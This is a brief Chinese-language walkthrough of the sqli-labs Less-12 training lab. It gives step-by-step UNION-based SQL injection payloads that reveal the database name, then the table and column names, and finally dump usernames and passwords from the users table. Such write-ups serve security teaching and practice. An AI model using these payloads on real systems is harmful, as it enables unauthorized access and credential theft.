SQL注入实例（sqli-labs/less-12）

 0、初始页面

1、确定闭合字符

2、确定列数

3、确定回显位置

4、爆库名

a") union select user(),database() #

5、爆表名

a") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

 

6、爆列名

a") union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security' #

7、查询最终结果

a") union select 1,group_concat(username,0x3a,password) from users #